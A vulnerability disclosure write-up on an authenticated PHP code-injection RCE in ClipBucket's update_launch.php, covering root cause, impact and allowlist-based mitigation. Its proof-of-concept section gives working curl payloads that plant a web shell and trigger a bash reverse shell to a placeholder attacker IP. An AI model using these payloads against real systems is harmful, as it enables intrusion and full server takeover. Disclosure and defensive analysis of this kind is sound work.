TL;DR
An authenticated administrator can inject arbitrary PHP code via the type parameter in update_launch.php, leading to Remote Code Execution (RCE).
This can be used to deploy a web shell and gain full system access.
Overview
While analyzing ClipBucket, I discovered an authenticated Remote Code Execution (RCE) vulnerability in the update mechanism.
The application dynamically generates a PHP script using user-controlled input and executes it via the PHP CLI. Due to improper sanitization, attackers can inject arbitrary PHP code into this generated script.
Vulnerable Code
The core issue lies in how user input is embedded into dynamically generated PHP code:
$data = '<?php
if (php_sapi_name() != \'cli\') { die; }
...
$type = \'' . $_POST['type'] . '\'; // VULNERABLE
...
?>';
fwrite($tmp_file, $data);
fclose($tmp_file);
// The generated file is executed via shell_exec using the PHP CLI.
$cmd = System::get_binaries('php') . ' -q ' . DirPath::get('temp') . 'update_core_tmp.php';
shell_exec($cmd);
Key Observations
- User input (
$_POST['type']) is directly concatenated - No escaping or sanitization is applied
- Generated PHP file is executed via
shell_exec()
Root Cause
The root cause is improper control of dynamically generated code (CWE-94).
Data flow:
User input → PHP string concatenation → file write → PHP CLI executionBecause the input is embedded inside a PHP string:
$type = '<USER_INPUT>';An attacker can break out of the string and inject arbitrary PHP code.
Proof of Concept
Stage 1: Web Shell Deployment (Persistence)
Crafted request:
curl -X POST "http://[TARGET]/admin_area/actions/update_launch.php" \
-H "Cookie: PHPSESSID=[ADMIN_SESSION_ID]" \
-d "type=core'; file_put_contents(dirname(__DIR__, 2).'/vuln.php', '<?php system(\$_GET[\"cmd\"]); ?>'); //"
Result
A web shell is created:
/vuln.phpVerification:
curl -s "http://[TARGET]/vuln.php?cmd=id"Expected output:
uid=1000(containeruser) gid=1000(containeruser)
Stage 2: Reverse Shell (Full System Control)
Listener:
nc -lvnp 4444
Trigger:
curl -G "http://[TARGET]/vuln.php" \
--data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'"
Result:
- Reverse shell established
- Full interactive access as
containeruser
Impact
Successful exploitation leads to full system compromise:
Direct Impact
- Arbitrary command execution
- Web shell deployment
- Persistent access
Extended Impact
- Full Data Access
Read sensitive files (e.g.,
config.inc.php, database credentials) - System Integrity Compromise Modify or delete application files
- Lateral Movement Use the compromised host as a pivot point
Attack Conditions
- Authentication required (Admin)
- Valid session (
PHPSESSID) - Access to admin panel endpoint
Patch Analysis
The vulnerability stems from unsafe string concatenation in code generation.
Secure Approach
- Avoid dynamic code generation using user input
- Escape or strictly validate inputs
- Use allowlists for expected values
Example mitigation:
$type = preg_replace('/[^a-zA-Z0-9_]/', '', $_POST['type']);Or ideally:
$allowed = ['core', 'plugin'];
if (!in_array($_POST['type'], $allowed)) {
die('Invalid type');
}Why This Matters
This vulnerability is particularly dangerous because:
- It combines code injection + execution
- Exploitation is straightforward once authenticated
- It results in immediate RCE without chaining
Additionally:
- The bug exists in an update mechanism
- Such features are often trusted and overlooked
- High-privilege context increases impact significantly
Key Insight
When user input is used to generate executable code:
It is no longer just input validation — it becomes code execution control
Conclusion
This vulnerability demonstrates how unsafe dynamic code generation can lead to critical security issues.
Although authentication is required, the impact is severe due to:
- Direct RCE capability
- High privilege execution context
- Ease of exploitation
Contribution
- Identified PHP code injection vector
- Developed working RCE PoC
- Demonstrated web shell + reverse shell
- Verified vulnerability on latest version
- Analyzed incomplete prior patch
Author
drkim
- GitHub: https://github.com/drkim-dev
- Team: https://redpoc.github.io/